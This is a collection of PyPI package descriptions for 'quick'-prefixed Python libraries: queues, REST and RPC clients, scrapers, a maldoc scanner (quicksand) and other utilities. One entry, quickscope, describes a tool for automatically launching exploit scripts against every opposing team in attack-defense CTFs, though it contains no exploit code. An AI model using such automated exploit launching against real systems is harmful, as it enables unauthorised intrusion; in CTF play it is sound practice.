withinit.def_process(qjq):# Define initial args to this process, if you do not call to init method, then it use default valuesqjq.init(\"\"\"\"\"\")qjq.put(\"A\")qjq.put(\"B\")qjq.put(\"C\")qjq.join()if__name__==\"__main__\":qjq=QJoinableQueue()p=multiprocessing.Process(target=_process,args=(qjq,))p.start()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()p.join()You can use defined args in the main constructor if you pass values.def_process(qjq,init_args):qjq.init(**init_args)qjq.put(\"A\")qjq.put(\"B\")qjq.put(\"C\")qjq.join()if__name__==\"__main__\":qjq=QJoinableQueue(\"\"\"\"\"\")p=multiprocessing.Process(target=_process,args=(qjq,qjq.get_init_args()))p.start()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()p.join()About performanceAn important fact is the size of list (named here \"bucket list\") in relation producer and consumers process to have\nthe best performance:If queue is full, mean consumers are slower than producer.If queue is empty, mean producer is slower than consumers.Then, best size of bucket list (size_bucket_list) is where queue is not full and not empty; for this, I implemented\none sensor to determinate in realtime thesize_bucket_list, you can enable this sensor ifsize_bucket_listisNone(if you define a number insize_bucket_list, then you want a constant value tosize_bucket_listand sensor\ndisable). by default sensor is enabled (size_bucket_list=None), because depend on Hardware in your computer thissize_bucket_listvalue should change, I recommend you test the best performance for your computer modifyingsize_bucket_list(withNoneand with number value).You can delimit sensor scope withmin_size_bucket_listandmax_size_bucket_list(ifmax_size_bucket_listis None then is infinite):qq=QQueue(min_size_bucket_list=10,max_size_bucket_list=1000)To disable the sensor define a size insize_bucket_list:qq=QQueue(size_bucket_list=120)Performance testHardware where the tests have been done:Processor: Intel i5 3.2GHzOperating System: Windows 10 x64Queue vs QuickQueueUsepython3 tests\\performance_qqueue_vs_queue.pyPut in a producer process and get in a consumer process N elements withQuickQueueandmultiprocessing.queue:10,000,000 elements (time: Queue = QuickQueue x 13.28 faster):QuickQueue: 0:00:24.436001 | Queue: 0:05:24.4881491,000,000 elements (time: Queue = QuickQueue x 17.55 faster):QuickQueue: 0:00:01.877998 | Queue: 0:00:32.951001100,000 elements (time: Queue = QuickQueue x 6.32 faster):QuickQueue: 0:00:00.591002 | Queue: 0:00:03.736011JoinableQueue vs JoinableQueueUsepython3 tests\\performance_qjoinablequeue_vs_joinablequeue.pyPut in a producer process and get in a consumer process N elements withQuickJoinableQueueandmultiprocessing.JoinableQueue:10,000,000 elements (time: JoinableQueue = QuickJoinableQueue x 6.12 faster):QuickJoinableQueue: 0:01:10.113079 | JoinableQueue: 0:08:09.9745701,000,000 elements (time: JoinableQueue = QuickJoinableQueue x 7.05 faster):QuickJoinableQueue: 0:00:06.858233 | JoinableQueue: 0:00:48.363999100,000 elements (time: JoinableQueue = QuickJoinableQueue x 3.33 faster):QuickJoinableQueue: 0:00:01.192382 | JoinableQueue: 0:00:03.702002DocumentationFunctions:QQueue: Main method to create aQuickQueueobject configured. Args:maxsize: maxsize of bucket lists in queue. Ifmaxsize<=0then queue is infinite (and sensor is disabled, I\nrecommend always define one positive number to save RAM memory). By default:1000size_bucket_list:Noneto enable sensor size bucket list (requiremaxsize>0). If a number is defined\nhere then use this number to size_bucket_list and disable sensor. Ifmaxsize<=0andsize_bucket_list==Nonethen size_bucket_list is default to1000;other wise,\nif maxsize<=0 and size_bucket_list is defined, then use this number. By default:Nonemin_size_bucket_list: (only if sensor is enabled) min size bucket list.Min == 1andmax == max_size_bucket_list - 1. By default:10max_size_bucket_list: (only if sensor is enabled) max size bucket list. IfNoneis infinite.\nBy default:NoneQJoinableQueue: Main method to create aQuickJoinableQueueobject configured. Args:maxsize: maxsize of bucket lists in queue. Ifmaxsize<=0then queue is infinite (and sensor is disabled, I\nrecommend always define one positive number to save RAM memory). By default:1000size_bucket_list:Noneto enable sensor size bucket list (requiremaxsize>0). If a number is defined\nhere then use this number to size_bucket_list and disable sensor. Ifmaxsize<=0andsize_bucket_list==Nonethen size_bucket_list is default to1000;other wise,\nif maxsize<=0 and size_bucket_list is defined, then use this number. By default:Nonemin_size_bucket_list: (only if sensor is enabled) min size bucket list.Min == 1andmax == max_size_bucket_list - 1. By default:10max_size_bucket_list: (only if sensor is enabled) max size bucket list. IfNoneis infinite.\nBy default:NoneClass:QuickQueueThis is a class with heritagemultiprocessing.queues.Queue. Methods overwritten:put_bucket: This put in the queue a list of data.put: This put in the queue a data wrapped in a list. Accumulate data until size_bucket_list, then put in queue.put_remain: Call to enqueue rest values that remains.put_iterable: This put in this QQueue all data from an iterable.end: Helper to call to put_remain and close queue in one method.get_bucket: This get from queue a list of data.get: This get from queue a data unwrapped from the list.qsize: This return the number of bucket lists (not the number of elements)QuickJoinableQueueThis is a class with heritageQuickQueueandmultiprocessing.queues.JoinableQueue. Methods overwritten:put_bucket: This put in the queue a list of data.join: This call toput_remainand call tojoin(Wait until the thread terminates) frommultiprocessing.queues.JoinableQueue.end: Raise a warning for bad use andput_remainredefined.Not overwritten but it is important for this class:task_done: Indicate that a formerly enqueued task is complete.ImprovementsTo implementQuickJoinableQueueI need to call toreleaseSemaphore one time for each element of bulk, this is not\nthe best solution, but it is the easy way to implementJoinableQueuewith security.Is useful for you?Maybe you would be so kind to consider the amount of hours puts in, the great effort and the resources expended in\ndoing this project. Thank you."} +{"package": "quickr", "pacakge-description": "No description available on PyPI."} +{"package": "quickreduce", "pacakge-description": "No description available on PyPI."} +{"package": "quickregress", "pacakge-description": "quickregressPolynomial regression for the lazyquickregressis a minimalist wrapper for sklearn's polynomial and linear regression functionality, intended to reduce the amount of effort needed for simple regression operations.quickregressprovides one function:regress(x, y, degree).regressreturns aRegressionResult, which has the following methods:predict(x)returns the model's predictions for a list of x values.formula(digits=6, latex=False)returns the model's formula as a string.digitschanges the number of significant digits, andlatexoutputs a LaTeX-friendly string (for use with Jupyter and the like)."} +{"package": "quickremi", "pacakge-description": "This library wraps the popular Python library \"REMI\" (https://github.com/rawpython/remi) to make easy UI by simply calling functions with arguments for UI placement. Quick Remi enables building building large UI in the least lines of code using pure Python. No HTML or javascript knowledge required.USAGE:pip install quickremifrom quickremi.gui import gui as GBuild Frame or Container\nframe1 = G.create_container(window, H=40, W=45, L=52, T=20, bg='lightblue')Build Labels\nlbl = G.create_label(frame1, H=50, W=75, L=5, T=2, bg='ivory')Build Buttons\nbtn= G.create_button(frame1, H=10, W=15, L=5, T=20, bg='teal', command=clicked_button)Use the function help menu to read their respective documentation.\nIn all functions, frame, H, W, L, T are positional (mandatory) arguments that determine their position within a container.\nOther arguments like background colours, font family, size, font colour, text alignment, justifications, border width, radius, style and border colour etc. are optional and can be changed as per use.Height, Width, Left and Top are % values by default and hence scale as per the size of the device of display.\nThe arugment 'fs' (font size) also scales as per the display device.Other Widgets in the package:\n- Drop Down\n- List Items\n- Slider\n- Image\n- File Uploader\n- Table\n- Progress Bar\n- Entry Field\n- Date Picker\n- Label Checkbox (Radio Button)\n- SpinboxAll the above widgets follow the same syntax.\n- Frame, Height, Width, Left, Top, and other kwargs whose documentation is available in the help menu.Widgets like Drop Down, Slider, List Items, Entry Field have listeners which read the input values entered by user.Example 1:\nFor: Drop Down or Entry or Slider etc.lst = ['Tiger', 'Lion', 'Jaguar']\ndd = G.create_dropdown(frame1, lst, 20, 50, 5, 5, command=on_selection)Listner functiondef on_selection(widget, value):\n# value will now hold the value of the user selection between tiger lion and jaguar.\nprint(value)Example 2:\nFor List Items, the listener functions in a different way. Following is the example usage.lst = ['Apple', 'Mango', 'Guava']\nlv = G.create_listview(frame1, lst, 20, 50, 5, 5, command=on_value_selection)Listener functiondef on_value_selection(widget, value):\n# value is the index number. Hence lv[val].get_text() is used to fetch the actual text value.val = lv.children[value].get_text()print(val)All the other widget operations revolve around these two examples."} +{"package": "quickrepo", "pacakge-description": "quickrepoIt is quite boring everytime typinggit initin your local computer then go to github and initialize a new repository, take the remote url and add it to the local... I am already tired just by explaining. Thanks Godquickrepoexists.quickrepo is a command-line application that automates initializing a new repository both locally and on GitHub. The user can either initialize the repository in the directory they are currently working in, or generate a brand new folder which will come initialized as a git and github repository.RequirementsPython 3.6+Installationinstall the official package from PyPIpip install quickrepoIf you have multiple versions of Python installed in your system, usepip3 install quickrepoinstead.or install editable source codegit clone github.com/silverhairs/quickrepo.git\ncd quickrepo\npip install --editable .UsageRunquickrepoto list all the available commands.Initialize a new Git & Github repositoryTo generate a brand new project both locally and on Github, open your terminal/command prompt and run:quickrepo newInitialize current working directory as Git & Github repositoryTo initialize a Git repository in the current working directory and push the content on Github, open your terminal/command prompt and runquickrepo here"} +{"package": "quickres", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quick-rest", "pacakge-description": "quick_restA versatile wrapper for REST APIs.DependenciesThe sole non-builtin dependency isrequests.InstallationUse pip to install.python -m pip install quick_restUsageNo full documentation at this time, maybe someday I'll get around to it...You can get and post right now, and use the auth methods listed below. You can pass anyrequestsgetorpostkwarg in on theClient.getandClient.postmethods.AuthenticationYou can currently use no authentication, key authentication and JWT authentication.No Authenticationfromquick_restimportClienturl='https://cat-fact.herokuapp.com/'client=Client(url)route='facts'response=client.get(route)Keyfromquick_restimportKeyClienturl='https://www.haloapi.com/'creds={'keyname':'somekeyhere'}client=KeyClient(url,creds)route='stats/hw2/xp?players=LamerLink'# check out my sweet Halo statsresponse=client.get(route)JWT (JSON Web Token)fromquick_restimportJWTClienturl='https://some-jwt-client.com/'creds={'username':'someusername','password':'somepassword'}# We need to specify the names for the auth_route, token_name, and jwt_key_name.client=JWTClient(url,creds,'auth','access_token','Authorization')route='v0/some/route/results.json'response=client.get(route)ResultsResults come in the form of aServerResponseobject. You can access theraw_contentattribute or use thedecode,get_value,to_txtandto_csvmethods to get the data from the object.raw_response=response.raw_responsedecoded_response=response.decode()# utf-8 by defaultdecoded_response=response.decode(encoding='utf-16')value=response.get_value(key_name)response.to_txt('some/path/file.txt')# dumps the raw response to fileresponse.to_csv('some/path/file.csv')# By default, to_csv sets \\n to lineterminator and writes the header to fileresponse.to_csv('some/path/file.csv',lineterminator='\\t',omit_header=True)Issues/SuggestionsPlease make any suggestions or issues on the Github page.To DoTests.Oauth client.LicenseThis project is licensed under the MIT License. Please see the LICENSE.md file for details."} +{"package": "quick-resto-API", "pacakge-description": "Quick Resto API\u0420\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044fQuick Resto API\u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f PythonQuick Resto API \u043d\u0430 PYPI"} +{"package": "quickrpc", "pacakge-description": "QuickRPC is a library that is designed for quick and painless setup of communication channels and Remote-call protocols.Python 3 onlyA remote interface is defined like so:from quickrpc import RemoteAPI, incoming, outgoing\n\nclass EchoAPI(RemoteAPI):\n '''Demo of how to use RemoteAPI.\n EchoAPI answers incoming `say` calls with an `echo` call.\n '''\n @incoming\n def say(self, sender=\"\", text=\"\"): pass\n\n @outgoing\n def echo(self, receivers=None, text=\"\"): passThe interface is used over aTransport, which might e.g. be a TCP connection or Stdio:api = EchoAPI(codec='jsonrpc', transport='tcpserv::8888')\n# on incoming \"say\", call \"echo\"\napi.say.connect(lambda sender=\"\", text=\"\": api.echo(text=text))\n\n# transport starts in a new thread.\napi.transport.start()\ninput('Serving on :8888 - press ENTER to stop')\napi.transport.stop()That\u2019s it! You could now connect to the server e.g. via telnet:$ telnet localhost 8888\nsay text:\"hello\"(Exit via Ctrl+5 -> \u201cquit\u201d)INSTALLATIONRequirements: Basically none, except for Python >= 3. For theQtTransports, PyQt4 is required.Then:pip install https://github.com/loehnertj/quickrpc/archive/master.zipOr, download / clone and usepython setup.py install.LICENSEMIT License:https://github.com/loehnertj/quickrpc/blob/master/LICENSEDOCUMENTATIONPlease proceed tohttp://quickrpc.readthedocs.io/en/latest/index.htmlTODOThis is a hobby project. If you need something quick, contact me or better, send a pull request. :-)Things I might add in the future: In-process \u201cloopback\u201d transport; Serial interface transport;msgpackCodec.SSH support would be really cool but don\u2019t hold your breath for that."} +{"package": "quickrspecpuppet", "pacakge-description": "# quickrspecpuppetPython CLI that allows you to quickly create basic rspec tests for your puppet modules## Get StartedInstall `quickrspecpuppet` using one of the following:$ pip install quickrspecpuppet$ python setup.py installRun `quickrspecpuppet` in the root directory of your puppet module:$ quickrspecpuppet## UsageQuickly create basic rspec tests for your puppet modules```Usage:quickrspecpuppet [ --directory=DIRECTORY ] [ --force ] [ --verbose ]quickrspecpuppet (-h | --help)Options:-d, --directory=DIRECTORY Base directory of puppet module [default: os.cwd]-f, --force Overwrite tests if they exist-v, --verbose Enable verbose logging-h, --help Show this screen.```## PackagingBuilding an RPM:```make rpms```"} +{"package": "quickrun", "pacakge-description": "quickrunquickrun is a module designed to make it easy to run commands and gather info from multiple servers.Dependenciespython3.8aws cli (v1)Getting startedSetupInstall:pip3 install quickrunUse:importquickrunfromquickrun.cli.awsimportfind_instances# Define instanceqr=quickrun.QuickRun()# Configureqr.servers=[quickrun.Server(host=\"my-ip-address-or-hostname\",name=\"my-web-server\",user=\"username\")]# or from aws cliqr.servers=quickrun.Servers.from_list(find_instances({'tag:environment':'production','tag:name':'*web*'},region='eu-west-1'))qr.commands=[quickrun.Command(name=\"Get openssl version\",cmd=\"openssl version\")]qr.formatter=quickrun.formatters.table# Callqr.main()qr.display()This will display something like:Results\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 server \u2503 host \u2503 command \u2503 output \u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 my-instance-name-1 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-2 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-3 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2502 my-instance-name-4 \u2502 192.168.0.1 \u2502 openssl version \u2502 OpenSSL 1.1.1 11 Sep 2018 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518Making a scriptOption 1: Basic script using some of the functionsYou can just write a normal python script and use some of the functions from this module.Seeexamples/healthcheck.pyas an example.Option 2: Calling out to QuickRunThere is also the baseQuickRunclass which can be configured and called.Seeexamples/openssl-version.pyandexamples/list-logs.pyas examples.Option 3: Extending QuickRunYou could also create your own class extending fromQuickRun.This is handy since you can override thehook methods.Seeexamples/get-memory-settings.pyas an example.HelpersThere are a few core helpers built in to quickrun.FormattersThere are a few formatters defined inquickrun.formattersdefault: Just prints out the python objectnone: Does nothingfake_shell: Formats the run as if it was ran directlytable: Outputs the run as a tablecli.awsThere is also a helpfulquickrun.cli.aws.find_instances()function that takes a dict of filters and returns matching instances.Example:find_instances({'tag:name':'web','tag:environment':'prod'},region='eu-west-1')cli.helpersThere is a collection of misc CLI helpers inquickrun.cli.helpers.Currently there is onlychallenge(expect: str) -> boolwhich prompts the user to re-enter a value.HooksTODO"} +{"package": "quicks", "pacakge-description": "Project generatorpip install quicks\n\nquicks PROJECT_NAME example.ymlexample.yml Jinja2 stylefiles:-'{{project}}/__init__.py'-'{{project}}/__main__.py'-'{{project}}/requirements.txt'-'.gitignore'-'LICENSE'-'Dockerfile'-'README.md'templates:'README.md':|# {{project}}"} +{"package": "quicksample", "pacakge-description": "QuickSampleA sample python package deployment utility for SQLShack Demo."} +{"package": "quicksample000012", "pacakge-description": "No description available on PyPI."} +{"package": "quicksample101", "pacakge-description": "Py-Module"} +{"package": "quicksample2", "pacakge-description": "No description available on PyPI."} +{"package": "quicksample611", "pacakge-description": "Hello les amis depuis quicksample"} +{"package": "quicksamplemedinillag", "pacakge-description": "QuickSampleA sample python package deployment utility for Data Demo."} +{"package": "quicksamplemule", "pacakge-description": "A sample python package deployment utility for Demo."} +{"package": "quicksampleTest", "pacakge-description": "Getting Started with APIMATIC CalculatorIntroductionSimple calculator API hosted on APIMATICBuildingYou must have Python3 >=3.7, <= 3.9installed on your system to install and run this SDK. This SDK package depends on other Python packages like nose, jsonpickle etc. These dependencies are defined in therequirements.txtfile that comes with the SDK. To resolve these dependencies, you can use the PIP Dependency manager. Install it by following steps athttps://pip.pypa.io/en/stable/installing/.Python and PIP executables should be defined in your PATH. Open command prompt and typepip --version. This should display the version of the PIP Dependency Manager installed if your installation was successful and the paths are properly defined.Using command line, navigate to the directory containing the generated files (includingrequirements.txt) for the SDK.Run the commandpip install -r requirements.txt. This should install all the required dependencies.InstallationThe following section explains how to use the apimaticcalculator library in a new project.1. Open Project in an IDEOpen up a Python IDE like PyCharm. The basic workflow presented here is also applicable if you prefer using a different editor or IDE.Click onOpenin PyCharm to browse to your generated SDK directory and then clickOK.The project files will be displayed in the side bar as follows:2. Add a new Test ProjectCreate a new directory by right clicking on the solution name as shown below:Name the directory as \"test\".Add a python file to this project.Name it \"testSDK\".In your python file you will be required to import the generated python library using the following code linesfromapimaticcalculator.apimaticcalculator_clientimportApimaticcalculatorClientAfter this you can write code to instantiate an API client object, get a controller object and make API calls. Sample code is given in the subsequent sections.3. Run the Test ProjectTo run the file within your test project, right click on your Python file inside your Test project and click onRunTest the SDKYou can test the generated SDK and the server with test cases.unittestis used as the testing framework andnoseis used as the test runner. You can run the tests as follows:Navigate to the root directory of the SDK and run the following commandspip install -r test-requirements.txt\nnosetestsInitialize the API ClientNote:Documentation for the client can be foundhere.The following parameters are configurable for the API Client:ParameterTypeDescriptionenvironmentEnvironmentThe API environment.Default:Environment.PRODUCTIONhttp_client_instanceHttpClientThe Http Client passed from the sdk user for making requestsoverride_http_client_configurationboolThe value which determines to override properties of the passed Http Client from the sdk userhttp_call_backHttpCallBackThe callback value that is invoked before and after an HTTP call is made to an endpointtimeoutfloatThe value to use for connection timeout.Default: 60max_retriesintThe number of times to retry an endpoint call if it fails.Default: 0backoff_factorfloatA backoff factor to apply between attempts after the second try.Default: 2retry_statusesArray of intThe http statuses on which retry is to be done.Default: [408, 413, 429, 500, 502, 503, 504, 521, 522, 524]retry_methodsArray of stringThe http methods on which retry is to be done.Default: ['GET', 'PUT']The API client can be initialized as follows:fromapimaticcalculator.apimaticcalculator_clientimportApimaticcalculatorClientfromapimaticcalculator.configurationimportEnvironmentclient=ApimaticcalculatorClient(environment=Environment.PRODUCTION,)List of APIsSimple CalculatorClasses DocumentationUtility ClassesHttpResponseHttpRequest"} +{"package": "quicksample-vdo-123123", "pacakge-description": "A sample python package deployment utility for SQLShack Demo."} +{"package": "quicksampleYentim0519", "pacakge-description": "A sample python package deployment utility for SQLShack Demo."} +{"package": "quicksand", "pacakge-description": "QuickSand Version 2QuickSand Python Package and Command Line ToolQuickSand is a Python-based analysis framework to analyze suspected malware documents to identify exploits in streams of different encodings or compressions. QuickSand supports documents, PDFs, Mime/Email, Postscript and other common formats. A built-in command line tool can process a single document or directory of documents.QuickSand scans within the decoded streams of documents and PDFs using Yara signatures to identify exploits or high risk active content.A hosted version is available to try without any installation atscan.tylabs.com.Files:src/quicksand/quicksand.py: Main quicksand class and CLI toolsrc/quicksand/quicksand_exe.yara: Yara rules to detect executables.src/quicksand/quicksand_exploits.yara: Yara rules to detect exploits in documents.src/quicksand/quicksand_pdf.yara: Yara rules to detect exploits in PDFs.bin/quicksand: Command line tool.requirements.txt: Python dependencieslambda/Optional AWS Lambda functionsWith Thanks to the Creators of:pdfreaderoletoolscryptographyzipfile38olefileyara-pythonyaraInstallation from Pypi using pippip3 install quicksandUpgrade from Pypi using pippip3 install --upgrade quicksandInstall from sourceIf you want to install from the source, such as the uicksand-main.zip downloaded from GitHub:pip3 install quicksand-main.zipCommand Line UsageA command line tool for quicksand to process and output json or txt results.usage: quicksand [-h] [-v] [-c] [-y] [-t TIMEOUT] [-e EXPLOIT] [-x EXE] [-a PDF] [-f {json,txt}] [-o OUT] [-p PASSWORD]\n [-d DROPDIR]\n document\n\nQuickSand Document and PDF maldoc analysis tool.\n\npositional arguments:\n document document or directory to scan\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --verbose increase output verbosity\n -c, --capture capture stream content\n -y, --yara capture yara matched strings\n -t TIMEOUT, --timeout TIMEOUT\n timeout in seconds\n -e EXPLOIT, --exploit EXPLOIT\n yara exploit signatures\n -x EXE, --exe EXE yara executable signatures\n -a PDF, --pdf PDF yara PDF signatures\n -f {json,txt}, --format {json,txt}\n output format\n -o OUT, --out OUT save output to this filename\n -p PASSWORD, --password PASSWORD\n password to decrypt ole or pdf\n -d DROPDIR, --dropdir DROPDIR\n save objects to this directoryProcess a single filequicksand document.docProcess a directory of filesquicksand malware/Python Module UsageFile from memoryfrom quicksand.quicksand import quicksand\nimport pprint\n\nqs = quicksand(data, timeout=18, strings=True)\nqs.process()\npprint.pprint(qs.results)Processing using a filenamefrom quicksand.quicksand import quicksand\n\nqs2 = quicksand(\"file.doc\")\nqs2.process()\nqs.resultsProcess a Directoryfrom quicksand.quicksand import quicksand\nqs = quicksand.readDir(\"malware\")\nqsReturns a dictionary of {filename:qs_results,...}.Optional initializer valuescapture: True|False return content of extracted streamsdebug: True|False print debugging messages to stdoutexploityara: Path to exploit yara rulesexecyara: Path to executable yara rulespdfyara: PDF Exploits yara rulespassword: Password for encrypted documents/PDFstimeout: Timeout processing: 0 for unlimited.ScoringDocuments are scored based on the rank value in the associated Yara signature metadata.Additionally, each signature defines whether the detected item is an exploit, a warning or a risky feature. For more information on how to interpret the results, please seehttps://scan.tylabs.com/howto.If you add your own signatures, they don't need to include the extra metadata to function.zlib issues on MacOSMacOS users may get zlib issues (PDF FlateDecode etc) due to missing OpenSSL headers since MacOs 10.4.zlib.error: Error -3 while decompressing data: unknown compression method\nzlib.error: Error -3 while decompressing data: incorrect header checkOne solution is to install zlib with Brew.sh and reinstall Python 3 using pyenv:export LDFLAGS=\"-L/usr/local/opt/zlib/lib\"\nexport CPPFLAGS=\"-I/usr/local/opt/zlib/include\"\npyenv install 3.8.5Using Quicksand?Let us know@tylabsIssues and Project HomeQuickSand GitHub"} +{"package": "quicksave", "pacakge-description": "A (very) simple file versioning systemVersion:1.7.0Detailed documentation on the available commands can be found on thequicksave wikiGetting started:The first thing you\u2019ll need to do is create a new database where\nquicksave can store its data:$ quicksave init That will setup the new database so it\u2019s ready to use.After that, you\u2019re good to go. You canregisternew files so they\u2019re\ntracked by quicksave,savenew states of registered files, andrevertto previously saved states. There are several other commands\nwhich modify the database itself, but I\u2019m only covering those three\nlisted commands in this guide (and none of their various options). For\ndetailed documentation on all of the available commands, check out thewiki page.To track (AKA register) a new file in quicksave use:$ quicksave register Which will copy the initial state of the file, and provide the names of\nthe file and state keys you\u2019ll need use this file. For a brief\ndescription of file and state keys, seethis\nnoteon the wiki.To then save a new state of the file, use the save command:$ quicksave save Quicksave will use the the absolute path and the base file name derived\nfromfilepathto automatically decide which file key to use.Lastly, to get the file back into a previously saved state, use the\nrevert command:$ quicksave revert Again, quicksave will attempt to determine which file key to use based\non the absolute path and the file name. Quicksave will lookup the\nprovidedstatekey and revert the file."} +{"package": "quick-sci-plot", "pacakge-description": "Quick Scientific PlotThe toolkit aims to plot neat charts and figures given datasets for scientific publications.ExamplesExample 1: Word frequency statfromquick_sci_plotimport*importpickle# load a dictionary (term, count)dict_tags_count=pickle.load(open(\"datasets/dict_tags_count.pickle\",\"rb\"))plot_bar(dict_tags_count)Example 2: Performance changefromquick_sci_plotimport*metrics=['UMass','C_V','NPMI','UCI']sub_fig=['(a)','(b)','(c)','(d)']csv_path=\"datasets/topic model performance.csv\"plot_reg(csv_path,sub_fig=sub_fig,metrics=metrics,x_label='Number of topics')LicenseThequick-sci-plottoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quickscope", "pacakge-description": "QuickscopeQuickscope is a lightweight exploit thrower for attack-defense CTFs.\nThis entails being able to communicate with a game interface (thetracker) and being able to launch exploits (theshooter).pip install quickscopeHow do I write an exploit?Write an ordinary script that takes its input as the environment variables$HOSTand$FLAG_ID.\nYou should hardcode the port used for the service, unless it is a very special variable service, in which case you should use$PORT.chmod +xthe script and make sure it has a shebang.\nYou should put the textx-service-name: servicenamein your script somewhere so that the shooter knows to shoot it against the serviceservicename.How do I launch an exploit?quickscope --everyone --script my_exploit.pyYour exploit must contain the textx-service-name: , whereis replaced with the name of the service to fire at.How do I launch all my exploits forever?quickscope --forever --corpus my_exploitsThe difference between --everyone and --forever is that --everyone only shoots at each target for the current tick once.How do I set up the tracker?In order for quickscope (the shooter) to fire exploits, it needs to be able to connect to the tracker.\nThe tracker is a python file that you should write for each CTF. Here's an example of it:fromquickscope.trackerimportTrackerclassMyTracker(Tracker):...if__name__=='__main__':MyTracker.main()You should implement the values marked as not implemented in tracker.py - this meansFLAG_REGEX,get_status,submit_flags, andinstrument_targets.\nSeefake/stub_tracker.pyfor an example implementation!You can then directly run your script and it will start tracking the game.If you're running the tracker in a non-hardcoded location, you will need to specify the--serverargument to the shooter."} +{"package": "quickscraper-sdk", "pacakge-description": "quickscraper-sdk-pythonRegister For Free https://www.quickscraper.coInstallationpipinstallquickscraper-sdkGet Free Access (Free Forever)Register yourself herehttps://app.quickscraper.co/auth/registerExamplesBasic Usagefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip')print(response._content)Write a HTML to Filefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')quickscraper_client.writeHtmlToFile('http://httpbin.org/ip',file_path='filename.html')Rendering Javascriptfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',render=True)print(response._content)Custom Headersfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('https://httpbin.org/headers',keep_headers=True,headers={'X-My-Custom-Header':'QS-APP'})print(response._content)Geographic Locationfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',country_code='US')print(response._content)Premium Residential/Mobile Proxy Poolsfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',premium=True)print(response._content)Device Typefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',device_type='mobile')print(response._content)Account Informationfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')usage=quickscraper_client.account()print(usage)Parser Addonfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Webhook Addonfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',webhookRequestId='WEBHOOK_ID')print(response._content)Get JSON from datafromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getData('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Write CSV, EXCEL to file from datafromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.writeHtmlToFile('http://httpbin.org/ip',file_path='YOUR_FILE_PATH',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Add Dynamic Inputs With 